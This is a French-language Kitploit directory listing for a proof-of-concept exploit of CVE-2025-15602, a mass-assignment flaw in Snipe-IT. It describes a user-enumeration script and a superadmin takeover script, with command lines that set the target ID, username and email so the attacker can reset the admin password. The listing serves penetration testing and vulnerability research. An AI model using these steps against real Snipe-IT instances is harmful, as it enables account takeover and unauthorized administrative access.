Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-15602-PoC — Snipe-IT < 8.3.7 Vulnérabilité d'assignation massive menant à une escalade de privilèges | Kitploit
Outils/GitHubGitHub/nxvh1337/cve-2025-15602-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHubnxvh1337/cve-2025-15602-poc

CVE-2025-15602-PoC

Snipe-IT < 8.3.7 Vulnérabilité d'assignation massive menant à une escalade de privilèges

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-15602-PoC

CVE-2025-15602-PoC est une preuve de concept de la vulnérabilité CVE-2025-15602 dans Snipe-IT. Un script pour lister tous les utilisateurs et un script pour prendre le contrôle d'un compte superadmin.

Contexte

Un utilisateur a seulement le droit de modifier les utilisateurs, il peut en abuser pour lister et effectuer une prise de contrôle du superadmin.

list_users.py

N'oubliez pas de modifier BASE_URL dans le script pour qu'il corresponde à votre instance de Snipe-IT.

Liste tous les utilisateurs de l'instance, pour obtenir l'ID du superadmin que vous souhaitez prendre le contrôle.

root@kitploit:~
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100

exploit_auth.py

N'oubliez pas de modifier BASE_URL dans le script pour qu'il corresponde à votre instance de Snipe-IT.

Prend le contrôle d'un compte superadmin via une affectation de masse (mass assignment)

IMPORTANT : vous devez d'abord obtenir les bonnes informations de list_users.py sinon cela ne fonctionnera pas. L'ID, le nom d'utilisateur et le prénom doivent être exactement les mêmes que ceux du compte cible.

root@kitploit:~
python3 exploit_auth.py \
  --target-id 1 \
  --admin-username admin \
  --admin-firstname Admin \
  --admin-email [email protected] \
  --attacker-username your_user \
  --attacker-password your_pass

Après cela, vous pouvez réinitialiser le mot de passe via l'e-mail que vous avez défini.

Dépendances

root@kitploit:~
pip install requests beautifulsoup4
Télécharger l’outil